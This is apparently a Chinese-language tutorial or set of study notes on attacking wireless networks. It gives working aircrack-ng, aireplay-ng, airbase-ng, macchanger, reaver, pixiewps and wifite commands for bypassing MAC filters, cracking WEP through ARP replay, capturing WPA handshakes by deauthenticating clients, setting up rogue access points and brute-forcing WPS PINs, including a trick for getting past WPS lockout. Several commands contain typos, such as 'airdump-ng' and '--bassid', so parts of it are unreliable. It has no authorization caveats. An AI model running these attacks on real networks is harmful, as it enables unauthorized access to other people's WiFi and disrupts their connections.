无线领域十分难以捉摸,从一点儿一点儿进步到现在,无线的安全深入人心,站在安全的角度来说无线通信一旦被截获或者窃取那么将造成无法估量的损失。
下面详细介绍无线WiFi领域的四种加密方式的攻击手段。
管理员误以为MAC绑定是一种安全机制,能够限制可以关联的客户端MAC地址。
准备AP:
1、AP基本配置
2、Open认证
3、开启无线过滤
修改MAC地址绕过过滤:
//一:别人做了白名单mac绑定,这样的话,侦听这个BSSID,查看哪一个STA的MAC已经连上,复制这个已经连上的STA的MAC,把这个MAC地址复制到自己的无线网卡的MAC上。
//ifconfig wlan0 down
//macchanger -m 接MAC地址 接网卡
//ifconfig wlan0 up
再去连接,就可以连接上了。——>双方存在的话会丢包,信号不好(除非只有一个存在)
WEP共享密钥破解
WEP密码破解原理:
1、IV并非完全随机
2、每224个包可能出现一次IV重用
3、收集大量IV之后找出相同IV及其对应密文,分析得出共享密码
ARP回包中包含IV
只要在IV足够多的情况下,任何复杂程度的WEP密码都可以被破解
(IV量破解和暴力破解)
流程:
启动monitor模式
启动抓包并保存抓包
Deauthentication抓取XOR文件
利用XOR文件与AP建立关联
执行ARP重放
Deauthentication触发ARP数据包
收集足够DATA之后破解密码
//利用抓到的keystream加密一个change发给AP,AP用这个keystream解密,确认解开,就可以建立关联。(keystream在.xor结尾的文件里(密文的))先建立关联才能进行数据包的发收、攻击等。
—————————————————————————————————————————
有新用户连接上时
原理:
例:
64位密钥=5(ASCII)*8(bit)+24iv=64
128位密钥=13(ASCII)*8(bit)+24iv=128
128位密钥=16(十六进制)*4(bit)*2(字符)=128
侦听这个AP的BSSID:
airdump-ng -c X --bssid XXX -w xxx wlan0mon
利用XOR文件与AP建立关联
aireplay-ng -1 60 -e kifi -y keystream.xor -a AP的BSSID -h 自己的MAC地址
//-1是authentication注入包的攻击方式,60s发一次,目标ESSID,抓取的密钥流,ESSID这个AP的BSSID的MAC,本机的无线MAC地址
//keystream是密钥流=XOR=change+cifer
//keystream有新用户连接上时才抓取到change从而计算出keystream。——>效率低
—————————————————————————————————————————
已经连接的情况
Deauthentication抓取XOR文件
aireplay-ng -0 10 -a AP的BSSID -c 已经关联的STA的MAC wlan0mon
//10次攻击,打击后PWR的值是0
//Deauthentication是-0注入包的攻击方式(用于打掉已关联的关联AP与STA),基于自动重连,我们就可以抓到数据包
从而得到keystream
—————————————————————————————————————————
通过上面两个得到keystream后,执行下面的:
执行ARP重放
//64位的密钥建议抓到20W以上的IV值,128位是150W以上的IV值。看情况,理论上IV值多越快。
//#Data里面代表IV值数据多少。
aireplay-ng -3 -b AP的MAC -h 本机无线MAC wlan0mon
ARP——>将IP地址转换为MAC地址。二层通信就是这样。
原理:通过本机电脑向AP发送ARP,接收AP响应的大量IV值。
思路:通过让已经连接的合法的STA向AP发送合法的ARP,然后中途截取后转到本机电脑,再由本机重放合法的ARP发给AP
//aireplay-ng -0 2 -a AP的BSSID -c 已经关联的STA的MAC wlan0mon
//打掉连接,产生ARP————>上面命令未得到ARP的话。
收集足够DATA之后破解密码
//可以一边抓一边破解
aircrack-ng XXX.cap————————>只要IV值足够,直接破解了。
//不用密码字典
—————————————————————————————————————————
FAKE AUTHENTICATION
WEP破解全部需要首先伪造认证,以便与AP进行正常通信
不产生ARP数据包
aireplay-ng -1 0 -e kifi -a -h
aireplay-ng -1 60 -o 1 -q 10 -e -a -h
每6000秒发送reauthentication
-o 1 每次身份认证只发一组认证数据包
-q 10 每10秒发keep-live帧
FAKE AUTHENTICATION排错
某些AP验证客户端MAC地址OUI(前三个字节)——>虚假客户端MAC
MAC地址过滤
Denied(Code 1)is WPA in use
WPA/WPA2不支持Fake authentication
使用真实MAC地址
物理靠近AP————>离信号太远
侦听信道正确
—————————————————————————————————————————
DEAUTHENTICATION攻击
强制客户端与AP断开关联
重连生成ARP请求,AP回包包含IV
WPA重连过程,过程抓取4步握手过程
无客户端情况下此攻击无效
aireplay-ng -0 0 -a kifi -c
0就是无限发包,直至打掉
不指定-c参数时,以广播攻击所有客户端
每攻击发送128个包,64个给AP,64个给客户端
物理足够接近被攻击者
DEAUTHENTICATION排错
物理足够接近被攻击者
与被攻击者使用相同无限标准b、n、g
客户端可能拒绝广播帧,建议指定客户端
—————————————————————————————————————————
ARP重放
侦听正常的ARP包并重放给AP
AP回包中包含大量弱IV——>重复出现
aireplay-ng -3 -b -h
-h 合法客户端/ 攻击者MAC
aireplay-ng data 字段
64bit密钥:25W
128bit密钥:150W
—————————————————————————————————————————
WEP破解
aireplay-ng wep.cap
—————————————————————————————————————————
关联不一定代表能够联网、无法数据传输。
WEP有两种方式:
1、有新用户连接时抓取到keystream,进行关联,抓IV,aircrack-ng xx.cap破解。
2、都是已经连接状态:打掉连接,通过抓取ARP,重放攻击到AP上,产生足够IV值,aircrack-ng xx.cap破解。
#####没有连接,是窃取不了的。
WPA PSK攻击只有一种密码破解方法:——>暴力破解
(WPA不存在WEP的弱点,只能暴力破解)
暴力破解条件:
1、CPU资源
2、时间
3、字典质量:
1、网上共享的字典
2、泄露密码
3、地区电话号码段
4、Crunch生成字典
5、kali中自带的字典 ——>有些密码不符合要求,会自动过滤
//理论上WPA2比WPA1相对安全
//我不觉得,肯定有其他方式破解
PSK破解过程:
启动monitor
开始抓包并保存
Deauthentication攻击获取4步握手信息 //打掉连接,待它重连的时期获取4步握手信息
使用字典暴力破解
airodump-ng wlan0mon --bassid MAC -c 11 -w wpa
aireplay-ng -0 2 -a BSSID的MAC -c STA的MAC wlan0mon
完成后会显示:WPA handshake——>四步握手信息
——>CH 11 ][ Elapsed: 7 mins ][ 2018-12-20 06:58 ][ WPA handshake: FA:62:14:E2:8D:
ls WPA* 就能看到保存下来的信息
aircrack-ng -w xxx WPA-01.cap
(-w是指定密码字典,kali自带的字典(其他软件的字典)有:/usr/share/john/password.lst、/usr/share/wfuzz/wordlist、/usr/share/wordlists/rockyou.txt.gz(使用:gunzip rockyou.txt.gz解压))
//查看多少行:cat password.txt | wc -l
//查看:grep XXX rockyou.txt
—————————————————————————————————————————
只有客户端,无AP情况下的WPA密码破解(距离客户端近,距离AP太远)
原理:客户端会发probe包,询问哪个是连接过得WiFi,泄露信息。
伪造AP,抓客户端MAC和他发送probe包要连接的AP,伪造一个这样的AP名进行四步握手。
启动monitor
开始抓包并保存
关键——>根据probe信息伪造相同ESSID的AP
抓取四步握手中的前两个 包——>重要信息(Nonce1、Nonce2、MAC1、MAC2)
使用字典暴力破解
//其实四步握手的前两步基本上就得到了重要信息(Nonce1、Nonce2、MAC1、MAC2),可以计算出PTK
PMK:(ESSID+Presharekey)进行4096的hash计算后生成的PMK。
——>
//伪造AP:airbase-ng --essid 对应的AP名 -c 11 wlan0mon
创造、伪造AP:
airbase-ng --essid AP名 -c 11 wlan0mon ————>OPEN方式
airbase-ng --essid AP名 -c 11 -z 2 wlan0mon————>WPA2、TKIP
airbase-ng --essid AP名 -c 11 -Z 4 wlan0mon————>WPA、CCMP
//破解:aircrack-ng -w 密码字典 WPA.cap
—————————————————————————————————————————
两种方式:
1、打掉已连接,抓取信息。
2、当STA需要主动连接已经连接过的WiFi时,伪造AP,获取握手信息。
WPS(WIRELESS PROTECTED SETUP)
WPS是WiFi联盟2006年开发的一项技术
通过PIN码来简化无线接入的操作,无需记住PSK
路由器和网卡各按一个按钮就能接入无线
PIN码是分为前后各4位的2段共8位数字
安全漏洞
2011年被发现安全涉及漏洞
接入发起方可以根据路由器的返回信息判断前4位是否正确
而PIN码的后4位只有1000种定义的组合(最后一位是checksum)
所以全部穷举破解只需要11000次尝试
PSK:218340105584896种可能
标准本身没有设计锁定机制,目前多个厂商已实现锁定机制
//都要支持WPS功能,初衷是:物理连接,物理确认(通过按钮 )。
//AP要是支持WPS的话,只要尝试最多11000次找出PIN码,就会被破解。
——>因为有限制,所以设置攻击方式、次数等
用计算器直接算出PIN
C83A35、00B00C——>很少见
//它直接找出PIN码,最多11000次;找出后计算出key,肯定能算出,不像WPA要字典。
——————————————————————————————————————————
启动侦听后,发现支持WPS的AP
wash -C -i wlan0mon
airodump-ng wlan0mon --wps
爆破PIN码
reaver -i wlan0mon -b -vv
秒破PIN码
reaver -i wlan0mon -b -vv -K 1
pixiewps
只适用于固定厂商的芯片,成功率很低
reaver -i wlan0mon -b -vv -p 88888888
问题:
很多厂家实现了锁定机制,所以爆破时应注意限速
一旦触发锁定,可尝试耗尽AP连接数,令其重启并解除WPS锁定
综合自动化无线密码破解工具:(命令:wifite)
//可自动侦听、扫描、攻击。
——>先pixiewps攻击、再常规攻击、再打掉抓过程攻击。
——————————————————————————————————————————
实操:
用reaver:
先stop service、再kill、再映射网卡。
wash -i wlan0mon
reaver -i wlan0mon -b -c <信道> -vv -K 1 ——>-K 1 看是否有漏洞的pin
(no pin)——>reaver -i wlan0mon -b -c <信道> -vv ——>all test
//一直尝试到正确的pin码,通过PIN码发送命令,查出密码。——>为防止锁定,尝试也有安全机制。
——>等待!!!
用pixiewps:——>工作方式:利用reaver抓包截获下来的这些个密文和随机数组合命令
//破解的效率提升。
pixiewps -e -r -s -z -a -n
//pke、pkr、e-hash1等都是reaver中完整的一次过程产生的值。
###
//当pixie破解出PIN码,回到reaver中输入:reaver -i wlan0mon -b
只要PIN码正确,就能直接查出密码。
###
用wifite:
wifite -h
————————————————————————————————————————————————————————
#有什么问题请评论进行解答,需要学习的可以留下邮箱给你发送学习资料。